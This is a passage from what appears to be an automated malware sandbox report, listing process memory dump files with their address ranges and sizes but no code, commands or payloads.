                                    • memory/4408-694-0x0000000003150000-0x0000000003156000-memory.dmp
                                      Filesize

                                      24KB

                                    • memory/4408-648-0x0000000003150000-0x0000000003156000-memory.dmp
                                      Filesize

                                      24KB

                                    • memory/4408-650-0x0000000003140000-0x000000000314B000-memory.dmp
                                      Filesize

                                      44KB

                                    • memory/4552-881-0x0000000000000000-mapping.dmp
                                    • memory/4596-1252-0x0000000140000000-0x00000001400C6000-memory.dmp
                                      Filesize

                                      792KB

                                    • memory/4596-1248-0x000000014006EE80-mapping.dmp
                                    • memory/4596-1253-0x0000000140000000-0x00000001400C6000-memory.dmp
                                      Filesize

                                      792KB

                                    • memory/4604-346-0x0000000000DD0000-0x0000000000DDC000-memory.dmp
                                      Filesize

                                      48KB

                                    • memory/4604-320-0x0000000000000000-mapping.dmp
                                    • memory/4604-340-0x0000000000DE0000-0x0000000000DE6000-memory.dmp
                                      Filesize

                                      24KB

                                    • memory/4604-661-0x0000000000DE0000-0x0000000000DE6000-memory.dmp
                                      Filesize

                                      24KB

                                    • memory/4752-620-0x0000000000620000-0x0000000000647000-memory.dmp
                                      Filesize

                                      156KB

                                    • memory/4752-343-0x0000000000000000-mapping.dmp
                                    • memory/4752-585-0x0000000000650000-0x0000000000672000-memory.dmp
                                      Filesize

                                      136KB

                                    • memory/4788-695-0x0000000000000000-mapping.dmp
                                    • memory/4812-777-0x0000000000000000-mapping.dmp
                                    • memory/4840-722-0x0000000004BA14B0-mapping.dmp
                                    • memory/4888-849-0x0000000000000000-mapping.dmp
                                    • memory/4888-857-0x000001D9228A0000-0x000001D922916000-memory.dmp
                                      Filesize

                                      472KB

                                    • memory/4888-854-0x000001D90A240000-0x000001D90A262000-memory.dmp
                                      Filesize

                                      136KB

                                    • memory/4924-1129-0x0000000000000000-mapping.dmp